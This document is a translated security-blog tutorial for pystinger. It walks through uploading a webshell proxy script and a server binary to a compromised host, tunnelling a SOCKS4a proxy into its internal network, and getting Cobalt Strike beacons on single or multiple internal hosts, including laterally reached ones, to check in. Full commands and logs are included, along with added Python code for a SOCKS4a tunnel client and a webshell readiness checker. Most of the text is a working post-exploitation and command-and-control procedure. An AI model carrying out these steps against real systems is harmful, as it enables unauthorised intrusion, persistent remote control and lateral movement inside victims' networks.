Article source: Khan安全攻防實驗室
pystinger implements a SOCKS4 proxy into the internal network and port mapping through a webshell, and can be used directly to bring hosts online in metasploit-framework, viper and cobalt strike.
The main body is written in Python; php, jsp(x) and aspx proxy scripts are currently supported.
Assume the server without outbound access is reachable at http://example.com:8080 and that its internal IP address is 192.168.3.11.
1 . SOCKS4 proxy
Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蟻劍) or Behinder (冰蝎) with: start D:/XXX/stinger_server.exe
Do not run D:/XXX/stinger_server.exe directly (without start): the webshell command blocks on the foreground process and the TCP connection drops.
On the VPS run: ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output like the following indicates success:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
A socks4a proxy into the internal network where example.com sits is now listening on the VPS at 127.0.0.1:60000.
The target server's 127.0.0.1:60020 is now mapped to the VPS's 127.0.0.1:60020 (MIRROR_LISTEN on the target side, TARGET_ADDRESS on the VPS side in the output above).
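The listener on 127.0.0.1:60000 speaks SOCKS4a, so any tool that can use that protocol (proxychains, Metasploit's socks proxy settings, and so on) can reach intranet hosts through it. The following is an added example, not code from the page or from the pystinger project, showing what such a client actually sends: a SOCKS4/4a CONNECT request, the 8-byte reply, and one HTTP request carried over the resulting tunnel. The proxy address 127.0.0.1:60000 and the intranet host 192.168.3.11 are the page's own values; the hostname dc01.corp.local used in the test is an assumed, constructed example.

```python
from __future__ import annotations

import socket
import struct

# SOCKS4 reply codes from the original SOCKS4 protocol description.
SOCKS4_GRANTED = 0x5A
SOCKS4_REPLY_TEXT = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "rejected: client identd not reachable",
    0x5D: "rejected: identd user-id mismatch",
}


def build_socks4a_request(dest_host: str, dest_port: int, userid: str = "") -> bytes:
    """Build a SOCKS4/4a CONNECT request.

    Layout: VN=4 | CD=1 (CONNECT) | DSTPORT (2 bytes, big-endian) | DSTIP (4 bytes)
            | USERID | NUL  [ | DOMAIN | NUL   (SOCKS4a form only) ]
    A dotted-quad dest_host is sent as plain SOCKS4. Any other name uses the SOCKS4a
    form: DSTIP is the invalid address 0.0.0.1 and the hostname is appended, so the
    proxy (here stinger_server, inside the target network) resolves it.
    """
    if not 0 < dest_port < 65536:
        raise ValueError(f"bad port {dest_port}")
    head = struct.pack("!BBH", 4, 1, dest_port)
    user = userid.encode("ascii") + b"\x00"
    try:
        return head + socket.inet_aton(dest_host) + user
    except OSError:  # not an IPv4 literal: let the proxy resolve the name
        return head + b"\x00\x00\x00\x01" + user + dest_host.encode("idna") + b"\x00"


def parse_socks4_reply(reply: bytes) -> tuple[int, str, int]:
    """Decode the 8-byte reply: VN=0 | CD | DSTPORT | DSTIP. Returns (cd, ip, port)."""
    if len(reply) != 8:
        raise ValueError(f"SOCKS4 reply must be 8 bytes, got {len(reply)}")
    vn, cd, port = struct.unpack("!BBH", reply[:4])
    if vn != 0:
        raise ValueError(f"unexpected SOCKS4 reply version {vn}")
    return cd, socket.inet_ntoa(reply[4:8]), port


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection during the handshake")
        buf += chunk
    return buf


def socks4a_connect(proxy: tuple[str, int], dest_host: str, dest_port: int,
                    timeout: float = 10.0) -> socket.socket:
    """Open a TCP connection to dest_host:dest_port through a SOCKS4a proxy."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(build_socks4a_request(dest_host, dest_port))
        cd, _, _ = parse_socks4_reply(_recv_exact(sock, 8))
        if cd != SOCKS4_GRANTED:
            raise ConnectionError(
                f"SOCKS4 CONNECT to {dest_host}:{dest_port} failed: "
                f"{SOCKS4_REPLY_TEXT.get(cd, hex(cd))}")
    except Exception:
        sock.close()
        raise
    return sock


def http_get_via_socks4a(proxy: tuple[str, int], host: str, port: int = 80,
                         path: str = "/", timeout: float = 10.0) -> bytes:
    """Fetch one URL from an intranet web server over the tunnel (HTTP/1.0, no keep-alive)."""
    with socks4a_connect(proxy, host, port, timeout) as sock:
        sock.sendall(
            f"GET {path} HTTP/1.0\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode())
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Usage against the listener the page starts with "-l 127.0.0.1 -p 60000",
    # fetching the page's example intranet host.
    print(http_get_via_socks4a(("127.0.0.1", 60000), "192.168.3.11", 8080)[:200])
```

Two points worth keeping in mind when using the proxy this way: SOCKS4 carries no authentication (the USERID field is informational only), so binding the listener to 127.0.0.1 with -l is the only access control on it; and SOCKS4/4a is TCP-only, so UDP-based tools and IPv6 destinations cannot go through it.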
2 . Cobalt Strike single-host check-in
Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蟻劍) or Behinder (冰蝎) with: start D:/XXX/stinger_server.exe
Do not run D:/XXX/stinger_server.exe directly (without start): the webshell command blocks on the foreground process and the TCP connection drops.
On the stinger_client command line run: ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output like the following indicates success:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
Add a listener in Cobalt Strike. For the port, use the Handler/LISTEN port printed under RAT Config in the output (usually 60020), and set the Beacons host to 127.0.0.1. The listener has to be reachable at 127.0.0.1:60020 on the VPS running stinger_client, because that is the TARGET_ADDRESS the tunnel delivers the mirrored connections to.
Generate the payload, upload it to the host and run it; the host will check in.
3 . Cobalt Strike multi-host check-in
Upload proxy.jsp to the target server and make sure http://example.com:8080/proxy.jsp is reachable and that the page returns UTF-8.
Upload stinger_server.exe to the target server and start the server side from AntSword (蟻劍) or Behinder (冰蝎) with: start D:/XXX/stinger_server.exe 192.168.3.11
192.168.3.11 can be replaced with 0.0.0.0 (listen on all interfaces). Note that the mirror port is then reachable from every host that can reach the server, and anything that connects to it is forwarded to the listener on the VPS.
On the stinger_client command line run: ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
Output like the following indicates success:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
Add a listener in Cobalt Strike. For the port, use the Handler/LISTEN port printed under RAT Config (usually 60020), and set the Beacons host to 192.168.3.11 (the internal IP address of example.com).
Generate the payload, upload it to the host and run it; the host will check in.
When moving laterally to other hosts, point their payloads at 192.168.3.11:60020 and they will check in through the same tunnel even though they have no outbound access themselves.
4 . Custom headers and proxy
If the webshell requires a Cookie or Authorization header, pass the request headers with the --header parameter:
--header "Authorization: XXXXXX,Cookie: XXXXX"
If the webshell has to be reached through a proxy, set it with the --proxy parameter:
--proxy "socks5:127.0.0.1:1081"
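Before starting stinger_client it is worth confirming, with the same headers and proxy you intend to pass on the command line, that the proxy script really answers the way steps 1 to 3 require (reachable, and the page returns UTF-8). The following is an added example, not code from the page or from the pystinger project: it parses --header and --proxy strings in the comma-separated and scheme:host:port forms the page shows, fetches the script with those headers, and reports whether the response body is the text UTF-8. Treating that body text as the ready signal is this example's reading of the page's wording; the URL, header and proxy values are the page's placeholders, and the SOCKS case is deliberately left to PySocks, which the standard library does not include.

```python
import urllib.error
import urllib.request


def parse_header_arg(arg: str) -> dict:
    """Parse the --header value, e.g. 'Authorization: XXXXXX,Cookie: XXXXX', into a dict.
    Entries are comma separated; each one is split on its first ':' only, so a value
    may itself contain colons or semicolons (e.g. 'Cookie: a=b; c=d')."""
    headers = {}
    for item in (arg or "").split(","):
        item = item.strip()
        if not item:
            continue
        if ":" not in item:
            raise ValueError(f"header entry without a colon: {item!r}")
        name, value = item.split(":", 1)
        headers[name.strip()] = value.strip()
    return headers


def parse_proxy_arg(arg: str):
    """Parse the --proxy value 'scheme:host:port', e.g. 'socks5:127.0.0.1:1081'.
    Assumes an IPv4 address or hostname (an IPv6 literal would need brackets)."""
    parts = arg.strip().rsplit(":", 2)
    if len(parts) != 3:
        raise ValueError(f"proxy must be scheme:host:port, got {arg!r}")
    scheme, host, port = parts
    scheme = scheme.lower()
    if scheme not in ("http", "https", "socks4", "socks5"):
        raise ValueError(f"unsupported proxy scheme {scheme!r}")
    return scheme, host, int(port)


def webshell_looks_ready(status: int, body: bytes) -> bool:
    """Ready signal assumed here: HTTP 200 and a body that is just the text UTF-8.
    Anything else (login page, error page, wrong path) fails the check."""
    return status == 200 and body.strip().upper() == b"UTF-8"


def check_webshell(url: str, header_arg: str = "", proxy_arg: str = "",
                   timeout: float = 10.0):
    """GET the proxy script with the configured headers, optionally through an HTTP
    proxy, and return (status, body, ready)."""
    headers = parse_header_arg(header_arg)
    handlers = []
    if proxy_arg:
        scheme, host, port = parse_proxy_arg(proxy_arg)
        if scheme.startswith("socks"):
            raise NotImplementedError(
                "urllib has no SOCKS support; use an HTTP proxy here or install PySocks")
        proxy_url = f"{scheme}://{host}:{port}"
        handlers.append(urllib.request.ProxyHandler({"http": proxy_url, "https": proxy_url}))
    opener = urllib.request.build_opener(*handlers)
    request = urllib.request.Request(url, headers=headers, method="GET")
    try:
        with opener.open(request, timeout=timeout) as resp:
            status, body = resp.status, resp.read(4096)
    except urllib.error.HTTPError as err:  # 401/403/404 still carry a useful body
        status, body = err.code, err.read(4096)
    return status, body, webshell_looks_ready(status, body)


if __name__ == "__main__":
    # Usage with the page's placeholder values; replace XXXXXX with the real values.
    status, body, ready = check_webshell(
        "http://example.com:8080/proxy.jsp",
        header_arg="Authorization: XXXXXX,Cookie: XXXXX")
    print(status, body[:64], "READY" if ready else "NOT READY")
```

A 200 that carries a login page instead of UTF-8 is the usual symptom of a missing or expired Cookie/Authorization header, which is exactly the case the --header parameter exists for.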
Tested environments:
stinger_server\stinger_client: windows, linux
proxy.jsp(x)/php/aspx: php7.2, tomcat7.0, iis8.0
Project address:
https://github.com/FunnyWolf/pystinger/releases/tag/v1.6